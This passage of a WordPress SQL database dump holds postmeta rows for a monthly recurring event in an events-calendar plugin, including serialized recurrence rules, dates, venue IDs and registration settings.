19:00:00'),(127414,263404,'_EventDuration','7200'),(127415,263404,'_EventCurrencySymbol',''),(127416,263404,'_EventCurrencyPosition','prefix'),(127417,263404,'_EventCost',''),(127418,263404,'_EventURL',''),(127419,263404,'_EventTimezone','America/Denver'),(127420,263404,'_EventTimezoneAbbr','MST'),(127421,263404,'_dp_original','263362'),(127422,263404,'_edit_lock','1620592340:2'),(127423,263404,'_edit_last','2'),(128863,263459,'protect_children',''),(128862,263459,'protect_children',''),(128861,263459,'protect_children',''),(128860,263459,'protect_children',''),(128859,263459,'protect_children',''),(128858,263459,'protect_children',''),(128857,263459,'protect_children',''),(128856,263459,'protect_children',''),(128855,263459,'_EventOrigin','events-calendar'),(127801,263232,'_tribe_modified_fields','a:2:{s:16:\"_EventRecurrence\";i:1610634916;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610634925;}'),(128228,263417,'_EventOrigin','events-calendar'),(128230,263417,'_RTECregistrationsDisabled','1'),(128226,263417,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128235,263417,'boldgrid_hide_page_title','0'),(128236,263417,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128227,263417,'_EventOrigin','events-calendar'),(128237,263417,'_EventShowMapLink','1'),(128238,263417,'_EventShowMap','1'),(128239,263417,'_EventVenueID','262305'),(128240,263417,'_EventCurrencySymbol',''),(128241,263417,'_EventCurrencyPosition','prefix'),(128242,263417,'_EventCost',''),(128243,263417,'_EventURL',''),(128244,263417,'_EventTimezone','America/Denver'),(128245,263417,'_dp_original','263362'),(128246,263417,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128223,263417,'protect_children',''),(128224,263417,'protect_children',''),(128225,263417,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128231,263417,'_RTECdeadlineType','start'),(128232,263417,'_RTECwhoCanRegister','any'),(128233,263417,'_RTEClimitRegistrations','0'),(128234,263417,'_RTECmaxRegistrations','30'),(128222,263417,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(127894,263418,'_EventStartDate','2021-01-31 10:00:00'),(127895,263418,'_EventStartDateUTC','2021-01-31 17:00:00'),(127896,263418,'_EventEndDate','2021-01-31 12:00:00'),(127897,263418,'_EventEndDateUTC','2021-01-31 19:00:00'),(127898,263418,'_EventDuration','7200'),(128253,263418,'_EventOrigin','events-calendar'),(128255,263418,'_RTECregistrationsDisabled','1'),(128251,263418,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128262,263418,'_EventShowMapLink','1'),(128263,263418,'_EventShowMap','1'),(128264,263418,'_EventVenueID','262305'),(128265,263418,'_EventCurrencySymbol',''),(128266,263418,'_EventCurrencyPosition','prefix'),(128267,263418,'_EventCost',''),(128268,263418,'_EventURL',''),(128269,263418,'_EventTimezone','America/Denver'),(128270,263418,'_dp_original','263362'),(128271,263418,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128252,263418,'_EventOrigin','events-calendar'),(128260,263418,'boldgrid_hide_page_title','0'),(128261,263418,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128248,263418,'protect_children',''),(128249,263418,'protect_children',''),(128250,263418,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128256,263418,'_RTECdeadlineType','start'),(128257,263418,'_RTECwhoCanRegister','any'),(128258,263418,'_RTEClimitRegistrations','0'),(128259,263418,'_RTECmaxRegistrations','30'),(128247,263418,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(127927,263419,'_EventStartDate','2021-02-28 10:00:00'),(127928,263419,'_EventStartDateUTC','2021-02-28 17:00:00'),(127929,263419,'_EventEndDate','2021-02-28 12:00:00'),(128422,263425,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(127930,263419,'_EventEndDateUTC','2021-02-28 19:00:00'),(127931,263419,'_EventDuration','7200'),(128277,263419,'_EventOrigin','events-calendar'),(128290,263419,'_EventCurrencySymbol',''),(128291,263419,'_EventCurrencyPosition','prefix'),(128292,263419,'_EventCost',''),(128293,263419,'_EventURL',''),(128294,263419,'_EventTimezone','America/Denver'),(128295,263419,'_dp_original','263362'),(128296,263419,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128278,263419,'_EventOrigin','events-calendar'),(128280,263419,'_RTECregistrationsDisabled','1'),(128281,263419,'_RTECdeadlineType','start'),(128282,263419,'_RTECwhoCanRegister','any'),(128276,263419,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128284,263419,'_RTECmaxRegistrations','30'),(128285,263419,'boldgrid_hide_page_title','0'),(128286,263419,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128287,263419,'_EventShowMapLink','1'),(128288,263419,'_EventShowMap','1'),(128289,263419,'_EventVenueID','262305'),(128273,263419,'protect_children',''),(128274,263419,'protect_children',''),(128275,263419,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(128283,263419,'_RTEClimitRegistrations','0'),(128272,263419,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635207;s:12:\"_EventOrigin\";i:1610635207;s:13:\"_thumbnail_id\";i:1610635207;s:26:\"_RTECregistrationsDisabled\";i:1610635207;s:17:\"_RTECdeadlineType\";i:1610635207;s:19:\"_RTECwhoCanRegister\";i:1610635207;s:23:\"_RTEClimitRegistrations\";i:1610635207;s:21:\"_RTECmaxRegistrations\";i:1610635207;s:24:\"boldgrid_hide_page_title\";i:1610635207;s:16:\"_EventRecurrence\";i:1610635207;s:17:\"_EventShowMapLink\";i:1610635207;s:13:\"_EventShowMap\";i:1610635207;s:13:\"_EventVenueID\";i:1610635207;s:20:\"_EventCurrencySymbol\";i:1610635207;s:22:\"_EventCurrencyPosition\";i:1610635207;s:10:\"_EventCost\";i:1610635207;s:9:\"_EventURL\";i:1610635207;s:14:\"_EventTimezone\";i:1610635207;s:12:\"_dp_original\";i:1610635207;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635207;s:16:\"tribe_events_cat\";i:1610660407;}'),(127960,263420,'_EventStartDate','2021-03-28 10:00:00'),(127961,263420,'_EventStartDateUTC','2021-03-28 16:00:00'),(128423,263425,'protect_children',''),(127962,263420,'_EventEndDate','2021-03-28 12:00:00'),(128424,263425,'protect_children',''),(127963,263420,'_EventEndDateUTC','2021-03-28 18:00:00'),(128425,263425,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635209;s:13:\"_thumbnail_id\";i:1610635209;s:26:\"_RTECregistrationsDisabled\";i:1610635209;s:17:\"_RTECdeadlineType\";i:1610635209;s:19:\"_RTECwhoCanRegister\";i:1610635209;s:23:\"_RTEClimitRegistrations\";i:1610635209;s:21:\"_RTECmaxRegistrations\";i:1610635209;s:24:\"boldgrid_hide_page_title\";i:1610635209;s:16:\"_EventRecurrence\";i:1610635209;s:17:\"_EventShowMapLink\";i:1610635209;s:13:\"_EventShowMap\";i:1610635209;s:13:\"_EventVenueID\";i:1610635209;s:20:\"_EventCurrencySymbol\";i:1610635209;s:22:\"_EventCurrencyPosition\";i:1610635209;s:10:\"_EventCost\";i:1610635209;s:9:\"_EventURL\";i:1610635209;s:14:\"_EventTimezone\";i:1610635209;s:12:\"_dp_original\";i:1610635209;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635209;s:16:\"tribe_events_cat\";i:1610660409;}'),(127964,263420,'_EventDuration','7200'),(128302,263420,'_EventOrigin','events-calendar'),(128315,263420,'_EventCurrencySymbol',''),(128316,263420,'_EventCurrencyPosition','prefix'),(128317,263420,'_EventCost',''),(128318,263420,'_EventURL',''),(128319,263420,'_EventTimezone','America/Denver'),(128320,263420,'_dp_original','263362'),(128321,263420,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128303,263420,'_EventOrigin','events-calendar'),(128305,263420,'_RTECregistrationsDisabled','1'),(128306,263420,'_RTECdeadlineType','start'),(128307,263420,'_RTECwhoCanRegister','any'),(128301,263420,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128309,263420,'_RTECmaxRegistrations','30'),(128310,263420,'boldgrid_hide_page_title','0'),(128311,263420,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:4:\"Last\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-31\";s:14:\"EventStartDate\";s:19:\"2020-11-29 10:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-29 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128312,263420,'_EventShowMapLink','1'),(128313,263420,'_EventShowMap','1'),(128314,263420,'_EventVenueID','262305'),(128298,263420,'protect_children',''),(128299,263420,'protect_children',''),(128300,263420,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(128308,263420,'_RTEClimitRegistrations','0'),(128297,263420,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_RTECwhoCanRegister\";i:1610635208;s:23:\"_RTEClimitRegistrations\";i:1610635208;s:21:\"_RTECmaxRegistrations\";i:1610635208;s:24:\"boldgrid_hide_page_title\";i:1610635208;s:16:\"_EventRecurrence\";i:1610635208;s:17:\"_EventShowMapLink\";i:1610635208;s:13:\"_EventShowMap\";i:1610635208;s:13:\"_EventVenueID\";i:1610635208;s:20:\"_EventCurrencySymbol\";i:1610635208;s:22:\"_EventCurrencyPosition\";i:1610635208;s:10:\"_EventCost\";i:1610635208;s:9:\"_EventURL\";i:1610635208;s:14:\"_EventTimezone\";i:1610635208;s:12:\"_dp_original\";i:1610635208;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635208;s:16:\"tribe_events_cat\";i:1610660408;}'),(127993,263421,'_EventStartDate','2021-04-25 10:00:00'),(127994,263421,'_EventStartDateUTC','2021-04-25 16:00:00'),(127995,263421,'_EventEndDate','2021-04-25 12:00:00'),(127996,263421,'_EventEndDateUTC','2021-04-25 18:00:00'),(127997,263421,'_EventDuration','7200'),(128327,263421,'_EventOrigin','events-calendar'),(128340,263421,'_EventCurrencySymbol',''),(128341,263421,'_EventCurrencyPosition','prefix'),(128342,263421,'_EventCost',''),(128343,263421,'_EventURL',''),(128344,263421,'_EventTimezone','America/Denver'),(128345,263421,'_dp_original','263362'),(128346,263421,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263417;a:2:{s:9:\"timestamp\";i:1609063200;s:8:\"duration\";i:7200;}i:263418;a:2:{s:9:\"timestamp\";i:1612087200;s:8:\"duration\";i:7200;}i:263419;a:2:{s:9:\"timestamp\";i:1614506400;s:8:\"duration\";i:7200;}i:263420;a:2:{s:9:\"timestamp\";i:1616925600;s:8:\"duration\";i:7200;}i:263421;a:2:{s:9:\"timestamp\";i:1619344800;s:8:\"duration\";i:7200;}i:263422;a:2:{s:9:\"timestamp\";i:1622368800;s:8:\"duration\";i:7200;}i:263423;a:2:{s:9:\"timestamp\";i:1624788000;s:8:\"duration\";i:7200;}i:263424;a:2:{s:9:\"timestamp\";i:1627207200;s:8:\"duration\";i:7200;}i:263425;a:2:{s:9:\"timestamp\";i:1630231200;s:8:\"duration\";i:7200;}i:263426;a:2:{s:9:\"timestamp\";i:1632650400;s:8:\"duration\";i:7200;}i:263427;a:2:{s:9:\"timestamp\";i:1635674400;s:8:\"duration\";i:7200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(128328,263421,'_EventOrigin','events-calendar'),(128330,263421,'_RTECregistrationsDisabled','1'),(128331,263421,'_RTECdeadlineType','start'),(128332,263421,'_RTECwhoCanRegister','any'),(128326,263421,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635208;s:12:\"_EventOrigin\";i:1610635208;s:13:\"_thumbnail_id\";i:1610635208;s:26:\"_RTECregistrationsDisabled\";i:1610635208;s:17:\"_RTECdeadlineType\";i:1610635208;s:19:\"_